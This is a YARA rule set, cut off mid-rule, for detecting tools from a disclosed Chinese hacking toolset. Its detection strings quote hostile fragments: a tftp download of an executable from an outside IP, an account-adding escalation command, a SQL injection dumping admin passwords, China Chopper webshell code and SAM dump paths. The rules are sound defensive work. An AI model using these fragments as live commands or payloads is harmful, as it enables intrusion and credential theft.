/* Yara Rule Set Author: Florian Roth Date: 2015-06-23 Identifier: CN-PentestSet */ /* Rule Set ----------------------------------------------------------------- */ rule CN_Honker_MAC_IPMAC { meta: description = "Sample from CN Honker Pentest Toolset - file IPMAC.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "24d55b6bec5c9fff4cd6f345bacac7abadce1611" id = "5424d3a7-765a-5dfb-9177-d5633f83079f" strings: $s1 = "Http://Www.YrYz.Net" fullword wide $s2 = "IpMac.txt" fullword ascii $s3 = "192.168.0.1" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 267KB and all of them } rule CN_Honker_GetSyskey { meta: description = "Sample from CN Honker Pentest Toolset - file GetSyskey.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "17cec5e75cda434d0a1bc8cdd5aa268b42633fe9" id = "08f5b5b1-3085-5bf1-9789-023be5a039f8" strings: $s2 = "GetSyskey [Output system key file]" fullword ascii /* PEStudio Blacklist: strings */ $s4 = "The system key file \"%s\" is created." fullword ascii /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 40KB and all of them } rule CN_Honker_Churrasco { meta: description = "Sample from CN Honker Pentest Toolset - file Churrasco.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "5a3c935d82a5ff0546eff51bb2ef21c88198f5b8" id = "58873cd6-0c9e-58a0-923a-aca8a1d42017" strings: $s0 = "HEAD9 /" ascii $s1 = "logic_er" fullword ascii $s6 = "proggam" fullword ascii $s16 = "DtcGetTransactionManagerExA" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 12 times */ $s17 = "GetUserNameA" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 305 times */ $s18 = "OLEAUT" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1276KB and all of them } rule CN_Honker_mysql_injectV1_1_Creak { meta: description = "Sample from CN Honker Pentest Toolset - file mysql_injectV1.1_Creak.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "a1f066789f48a76023598c5777752c15f91b76b0" id = "39025a57-557a-53c0-bfdb-81fe83f824af" strings: $s0 = "1http://192.169.200.200:2217/mysql_inject.php?id=1" fullword ascii /* PEStudio Blacklist: strings */ $s12 = "OnGetPassword" fullword ascii /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 5890KB and all of them } rule CN_Honker_ASP_wshell { meta: description = "Sample from CN Honker Pentest Toolset - file wshell.txt" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "3ae33c835e7ea6d9df74fe99fcf1e2fb9490c978" id = "028136cd-129b-5d58-a4c2-ba730a798c06" strings: $s0 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii /* PEStudio Blacklist: strings */ $s1 = "UserPass=" $s2 = "VerName=" $s3 = "StateName=" condition: uint16(0) == 0x253c and filesize < 200KB and all of them } rule CN_Honker_exp_iis7 { meta: description = "Sample from CN Honker Pentest Toolset - file iis7.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "0a173c5ece2fd4ac8ecf9510e48e95f43ab68978" id = "edfafc9a-032a-5ccb-9a1f-faeab0dfa31d" strings: $s0 = "\\\\localhost" fullword ascii /* PEStudio Blacklist: strings */ $s1 = "iis.run" fullword ascii $s3 = ">Could not connecto %s" fullword ascii /* PEStudio Blacklist: strings */ $s4 = "WinSta0\\Default" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 22 times */ condition: uint16(0) == 0x5a4d and filesize < 60KB and all of them } rule CN_Honker_SegmentWeapon { meta: description = "Sample from CN Honker Pentest Toolset - file SegmentWeapon.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "494ef20067a7ce2cc95260e4abc16fcfa7177fdf" id = "e1b6f721-4c4d-50f2-9ed6-f38e8e7ea4ab" strings: $s0 = "C:\\WINDOWS\\system32\\msvbvm60.dll\\3" fullword ascii /* PEStudio Blacklist: strings */ $s1 = "http://www.nforange.com/inc/1.asp?" fullword wide condition: uint16(0) == 0x5a4d and filesize < 100KB and all of them } rule CN_Honker_Alien_iispwd { meta: description = "Sample from CN Honker Pentest Toolset - file iispwd.vbs" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "5d157a1b9644adbe0b28c37d4022d88a9f58cedb" id = "e561c548-c656-5528-a2a8-2798a59ac6bf" strings: $s0 = "set IIs=objservice.GetObject(\"IIsWebServer\",childObjectName)" fullword ascii /* PEStudio Blacklist: strings */ $s1 = "wscript.echo \"from : http://www.xxx.com/\" &vbTab&vbCrLf" fullword ascii /* PEStudio Blacklist: strings */ condition: filesize < 3KB and all of them } rule CN_Honker_Md5CrackTools { meta: description = "Sample from CN Honker Pentest Toolset - file Md5CrackTools.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "9dfd9c9923ae6f6fe4cbfa9eb69688269285939c" id = "16e04a66-0f6f-5b94-97c3-df62aa9406a9" strings: $s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii /* PEStudio Blacklist: agent */ $s2 = ",'|head -n 1|cut -d ' ' -f 1|sed" ascii /* PEStudio Blacklist: strings */ condition: filesize < 30KB and all of them } rule CN_Honker_COOKIE_CooKie { meta: description = "Sample from CN Honker Pentest Toolset - file CooKie.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "f7727160257e0e716e9f0cf9cdf9a87caa986cde" id = "5f85bb0f-6df2-512c-ba1a-8a74c1a55563" strings: $s4 = "-1 union select 1,username,password,4,5,6,7,8,9,10 from admin" fullword ascii /* PEStudio Blacklist: strings */ $s5 = "CooKie.exe" fullword wide /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 360KB and all of them } rule CN_Honker_wwwscan_1_wwwscan { meta: description = "Sample from CN Honker Pentest Toolset - file wwwscan.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "6bed45629c5e54986f2d27cbfc53464108911026" id = "8b6a94a3-6f9c-59b2-931b-c06701b95d59" strings: $s0 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii /* PEStudio Blacklist: strings */ $s3 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 180KB and all of them } rule CN_Honker_D_injection_V2_32 { meta: description = "Sample from CN Honker Pentest Toolset - file D_injection_V2.32.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "3a000b976c79585f62f40f7999ef9bdd326a9513" id = "4c661c35-61ee-5ee7-9b8e-9908fbe0362b" strings: $s0 = "Missing %s property(CommandText does not return a result set{Error creating obje" wide /* PEStudio Blacklist: strings */ $s1 = "/tftp -i 219.134.46.245 get 9493.exe c:\\9394.exe" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 5000KB and all of them } rule CN_Honker_net_priv_esc2 { meta: description = "Sample from CN Honker Pentest Toolset - file net-priv-esc2.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "4851e0088ad38ac5b3b1c75302a73698437f7f17" id = "b4fa3129-57a3-55ee-8ca6-ecbcc135184e" strings: $s1 = "Usage:%s username password" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 17KB and all of them } rule CN_Honker_Oracle_v1_0_Oracle { meta: description = "Sample from CN Honker Pentest Toolset - file Oracle.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "0264f4efdba09eaf1e681220ba96de8498ab3580" id = "0cebede9-f4ff-5efb-98bc-55df0ad656a3" strings: $s1 = "!http://localhost/index.asp?id=zhr" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "OnGetPassword" fullword ascii /* PEStudio Blacklist: strings */ $s3 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 3455KB and all of them } rule CN_Honker_Interception { meta: description = "Sample from CN Honker Pentest Toolset - file Interception.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "ea813aed322e210ea6ae42b73b1250408bf40e7a" id = "40d350e5-c6af-58e2-a1d8-f9516af5f869" strings: $s2 = ".\\dat\\Hookmsgina.dll" fullword ascii /* PEStudio Blacklist: strings */ $s5 = "WinlogonHackEx " fullword wide /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 160KB and all of them } rule CN_Honker_sig_3389_DUBrute_v3_0_RC3_3_0 { meta: description = "Sample from CN Honker Pentest Toolset - file 3.0.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "49b311add0940cf183e3c7f3a41ea6e516bf8992" id = "994ad7e9-2019-54b3-84e6-2762a700c939" strings: $s0 = "explorer.exe http://bbs.yesmybi.net" fullword ascii /* PEStudio Blacklist: strings */ $s1 = "LOADER ERROR" fullword ascii /* PEStudio Blacklist: strings */ $s9 = "CryptGenRandom" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 581 times */ condition: uint16(0) == 0x5a4d and filesize < 395KB and all of them } rule CN_Honker_windows_exp { meta: description = "Sample from CN Honker Pentest Toolset - file exp.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "04334c396b165db6e18e9b76094991d681e6c993" id = "148900d0-cf62-5cb0-adbc-52fa8ce8832e" strings: $s0 = "c:\\windows\\system32\\command.com /c " fullword ascii /* PEStudio Blacklist: strings */ $s8 = "OH,Sry.Too long command." fullword ascii /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 220KB and all of them } rule CN_Honker_safe3wvs_cgiscan { meta: description = "Sample from CN Honker Pentest Toolset - file cgiscan.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "f94bbf2034ad9afa43cca3e3a20f142e0bb54d75" id = "a9f7a195-deb8-5887-bc55-d1b0cac43182" strings: $s2 = "httpclient.exe" fullword wide $s3 = "www.safe3.com.cn" fullword wide condition: uint16(0) == 0x5a4d and filesize < 357KB and all of them } rule CN_Honker_pr_debug { meta: description = "Sample from CN Honker Pentest Toolset - file debug.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "d11e6c6f675b3be86e37e50184dadf0081506a89" id = "6d759818-b762-56f4-8475-82a7d18a659c" strings: $s1 = "-->Got WMI process Pid: %d " ascii /* PEStudio Blacklist: strings */ $s2 = "This exploit will execute \"net user temp 123456 /add & net localg" ascii /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 820KB and all of them } rule CN_Honker_T00ls_Lpk_Sethc_v4_0 { meta: description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v4.0.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "98f21f72c761e504814f0a7db835a24a2413a6c2" id = "d41cbed5-a6e3-5165-a8c3-e0375c1ed75d" strings: $s0 = "LOADER ERROR" fullword ascii /* PEStudio Blacklist: strings */ $s15 = "2011-2012 T00LS&RICES" fullword wide condition: uint16(0) == 0x5a4d and filesize < 2077KB and all of them } rule CN_Honker_MatriXay1073 { meta: description = "Sample from CN Honker Pentest Toolset - file MatriXay1073.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" modified = "2023-01-27" score = 70 hash = "fef951e47524f827c7698f4508ba9551359578a5" id = "23e73b89-f60e-5bc3-8974-15be16d7c408" strings: $s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1" ascii /* PEStudio Blacklist: strings */ $s1 = "Policy\\Scan\\GetUserLen.ini" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "!YEL!Using http://127.0.0.1:%d/ to visiter https://%s:%d/" ascii /* PEStudio Blacklist: strings */ $s3 = "getalluserpasswordhash" fullword ascii /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 9100KB and all of them } rule CN_Honker_Sword1_5 { meta: description = "Sample from CN Honker Pentest Toolset - file Sword1.5.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "96ee5c98e982aa8ed92cb4cedb85c7fda873740f" id = "832e4998-64fc-5f34-a46d-aeefde0ee763" strings: $s1 = "http://www.md5.com.cn" fullword wide $s2 = "ListBox_Command" fullword wide /* PEStudio Blacklist: strings */ $s3 = "\\Set.ini" wide $s4 = "OpenFileDialog1" fullword wide condition: uint16(0) == 0x5a4d and filesize < 740KB and all of them } rule CN_Honker_Havij_Havij { meta: description = "Sample from CN Honker Pentest Toolset - file Havij.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "0d8b275bd1856bc6563dd731956f3b312e1533cd" id = "b3640a32-b546-58c9-abb1-3da60dc6633c" strings: $s1 = "User-Agent: %Inject_Here%" fullword wide /* PEStudio Blacklist: strings */ $s2 = "BACKUP database master to disk='d:\\Inetpub\\wwwroot\\1.zip'" fullword ascii /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 3000KB and all of them } rule CN_Honker_exp_ms11011 { meta: description = "Sample from CN Honker Pentest Toolset - file ms11011.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "5ad7a4962acbb6b0e3b73d77385eb91feb88b386" id = "fc092166-73cd-58f6-b034-a2fe2c5fb859" strings: $s0 = "\\i386\\Hello.pdb" ascii /* PEStudio Blacklist: strings */ $s1 = "OS not supported." fullword ascii /* PEStudio Blacklist: strings */ $s2 = ".Rich5" fullword ascii $s3 = "Not supported." fullword wide /* PEStudio Blacklist: strings */ /* Goodware String - occured 3 times */ $s5 = "cmd.exe" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 120 times */ condition: uint16(0) == 0x5a4d and filesize < 100KB and all of them } rule CN_Honker_DLL_passive_privilege_escalation_ws2help { meta: description = "Sample from CN Honker Pentest Toolset - file ws2help.dll" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "e539b799c18d519efae6343cff362dcfd8f57f69" id = "85a07bb7-2856-56f0-bd15-e020bb2a7692" strings: $s0 = "PassMinDll.dll" fullword ascii $s1 = "\\ws2help.dll" ascii condition: uint16(0) == 0x5a4d and filesize < 30KB and all of them } rule CN_Honker_Webshell { meta: description = "Sample from CN Honker Pentest Toolset - file Webshell.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "c85bd09d241c2a75b4e4301091aa11ddd5ad6d59" id = "12870766-2b85-522d-9ad8-abba2786caaf" strings: $s1 = "Windows NT users: Please note that having the WinIce/SoftIce" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "Do you want to cancel the file download?" fullword ascii /* PEStudio Blacklist: strings */ $s3 = "Downloading: %s" fullword ascii /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 381KB and all of them } rule CN_Honker_AspxClient { meta: description = "Sample from CN Honker Pentest Toolset - file AspxClient.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" modified = "2022-12-21" score = 70 hash = "67569a89128f503a459eab3daa2032261507f2d2" id = "7e38365c-ffe5-5fcd-8bd6-948d255d6e10" strings: $s1 = "\\tools\\hashq\\hashq.exe" wide $s2 = "\\Release\\CnCerT.CCdoor.Client.pdb" ascii $s3 = "\\myshell.mdb" wide /* PEStudio Blacklist: strings */ $s4 = "injectfile" fullword wide /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 1000KB and 3 of them } rule CN_Honker_Fckeditor { meta: description = "Sample from CN Honker Pentest Toolset - file Fckeditor.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "4b16ae12c204f64265acef872526b27111b68820" id = "eb8767cb-b081-5c37-b7ad-57a0de047462" strings: $s0 = "explorer.exe http://user.qzone.qq.com/568148075" fullword wide /* PEStudio Blacklist: strings */ $s7 = "Fckeditor.exe" fullword wide /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 1340KB and all of them } rule CN_Honker_Codeeer_Explorer { meta: description = "Sample from CN Honker Pentest Toolset - file Codeeer Explorer.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "f32e05f3fefbaa2791dd750e4a3812581ce0f205" id = "d4a88ae7-c0b2-57d2-a070-3dd748a30a3a" strings: $s2 = "Codeeer Explorer.exe" fullword wide /* PEStudio Blacklist: strings */ $s12 = "webBrowser1_ProgressChanged" fullword ascii /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 470KB and all of them } rule CN_Honker_SwordHonkerEdition { meta: description = "Sample from CN Honker Pentest Toolset - file SwordHonkerEdition.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "3f9479151c2cada04febea45c2edcf5cece1df6c" id = "5688fa03-bcb0-545d-9fdf-7ab48a389424" strings: $s0 = "\\bin\\systemini\\MyPort.ini" wide /* PEStudio Blacklist: strings */ $s1 = "PortThread=200 //" fullword wide /* PEStudio Blacklist: strings */ $s2 = " Port Open -> " fullword wide /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 375KB and all of them } rule CN_Honker_HASH_PwDump7 { meta: description = "Sample from CN Honker Pentest Toolset - file PwDump7.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "93a2d7c3a9b83371d96a575c15fe6fce6f9d50d3" id = "d61a1ac3-7c8a-5de2-a5a8-2a043b73f3b3" strings: $s1 = "%s\\SYSTEM32\\CONFIG\\SAM" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "No Users key!" fullword ascii /* PEStudio Blacklist: strings */ $s3 = "NO PASSWORD*********************:" fullword ascii /* PEStudio Blacklist: strings */ $s4 = "Unable to dump file %S" fullword ascii /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 380KB and all of them } rule CN_Honker_ChinaChopper { meta: description = "Sample from CN Honker Pentest Toolset - file ChinaChopper.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "fa347fdb23ab0b8d0560a0d20c434549d78e99b5" id = "9f7fbaac-65b5-5162-87d1-96ccd9711adb" strings: $s1 = "$m=get_magic_quotes_gpc();$sid=$m?stripslashes($_POST[\"z1\"]):$_POST[\"z1\"];$u" wide /* PEStudio Blacklist: strings */ $s3 = "SETP c:\\windows\\system32\\cmd.exe " fullword wide /* PEStudio Blacklist: strings */ $s4 = "Ev al (\"Exe cute(\"\"On+Error+Resume+Next:%s:Response.Write(\"\"\"\"->|\"\"\"\"" wide /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 2000KB and 1 of them } rule CN_Honker_dedecms5_7 { meta: description = "Sample from CN Honker Pentest Toolset - file dedecms5.7.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "f9cbb25883828ca266e32ff4faf62f5a9f92c5fb" id = "b037862d-2821-5e96-996b-13ab241575ba" strings: $s1 = "/data/admin/ver.txt" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "SkinH_EL.dll" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 830KB and all of them } rule CN_Honker_Alien_ee { meta: description = "Sample from CN Honker Pentest Toolset - file ee.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "15a7211154ee7aca29529bd5c2500e0d33d7f0b3" id = "03540f82-6662-55e3-97f8-38776271f08b" strings: $s1 = "GetIIS UserName and PassWord." fullword wide /* PEStudio Blacklist: strings */ $s2 = "Read IIS ID For FreeHost." fullword wide /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 50KB and all of them } rule CN_Honker_smsniff_smsniff { meta: description = "Sample from CN Honker Pentest Toolset - file smsniff.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "8667a785a8ced76d0284d225be230b5f1546f140" id = "fef242d5-b274-5217-a5d1-1a6ec38d0fdd" strings: $s1 = "smsniff.exe" fullword wide $s5 = "SmartSniff" fullword wide condition: uint16(0) == 0x5a4d and filesize < 267KB and all of them } rule CN_Honker_Happy_Happy { meta: description = "Sample from CN Honker Pentest Toolset - file Happy.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" modified = "2023-01-27" score = 70 hash = "92067d8dad33177b5d6c853d4d0e897f2ee846b0" id = "6e6c806d-e784-507f-b327-3b9f2510422b" strings: $s1 = "" fullword wide /* PEStudio Blacklist: strings */ $s2 = "domainscan.exe" fullword wide /* PEStudio Blacklist: strings */ $s3 = "http://www.happysec.com/" wide $s4 = "cmdshell" fullword ascii /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 655KB and 2 of them } rule CN_Honker_T00ls_Lpk_Sethc_v3_0 { meta: description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v3.0.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "fa47c4affbac01ba5606c4862fdb77233c1ef656" id = "7513a513-e8a3-58a8-8dd5-512ba33ff013" strings: $s1 = "http://127.0.0.1/1.exe" fullword wide /* PEStudio Blacklist: strings */ $s2 = ":Rices Forum:T00Ls.Net [4 Fucker Te@m]" fullword wide $s3 = "SkinH_EL.dll" fullword wide condition: uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them } rule CN_Honker_NetFuke_NetFuke { meta: description = "Sample from CN Honker Pentest Toolset - file NetFuke.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "f89e223fd4f6f5a3c2a2ea225660ef0957fc07ba" id = "833da5c7-e562-50e9-a2a9-54c36b0d1f61" strings: $s1 = "Mac Flood: Flooding %dT %d p/s " fullword ascii $s2 = "netfuke_%s.txt" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1840KB and all of them } rule CN_Honker_ManualInjection { meta: description = "Sample from CN Honker Pentest Toolset - file ManualInjection.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "e83d427f44783088a84e9c231c6816c214434526" id = "f0899003-824f-56ed-b653-9f7a77b9ec6a" strings: $s0 = "http://127.0.0.1/cookie.asp?fuck=" fullword ascii /* PEStudio Blacklist: strings */ $s16 = "http://Www.cnhuker.com | http://www.0855.tv" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 3000KB and all of them } rule CN_Honker_CnCerT_CCdoor_CMD { meta: description = "Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "1c6ed7d817fa8e6534a5fd36a94f4fc2f066c9cd" id = "ddd328a8-7ad8-5b26-9deb-3e5da801cd1b" strings: $s2 = "CnCerT.CCdoor.CMD.dll" fullword wide $s3 = "cmdpath" fullword ascii $s4 = "Get4Bytes" fullword ascii $s5 = "ExcuteCmd" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 22KB and all of them } rule CN_Honker_termsrvhack { meta: description = "Sample from CN Honker Pentest Toolset - file termsrvhack.dll" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "1c456520a7b7faf71900c71167038185f5a7d312" id = "4fd582a1-3c6d-57a1-bba0-f775bb61ef00" strings: $s1 = "The terminal server cannot issue a client license. It was unable to issue the" wide /* PEStudio Blacklist: strings */ $s6 = "%s\\%s\\%d\\%d" fullword wide condition: uint16(0) == 0x5a4d and filesize < 1052KB and all of them } rule CN_Honker_IIS6_iis6 { meta: description = "Sample from CN Honker Pentest Toolset - file iis6.com" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "f0c9106d6d2eea686fd96622986b641968d0b864" id = "f5d49cbd-1aec-5126-ab5d-83e485fa6869" strings: $s0 = "GetMod;ul" fullword ascii $s1 = "excjpb" fullword ascii $s2 = "LEAUT1" fullword ascii $s3 = "EnumProcessModules" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 410 times */ condition: uint16(0) == 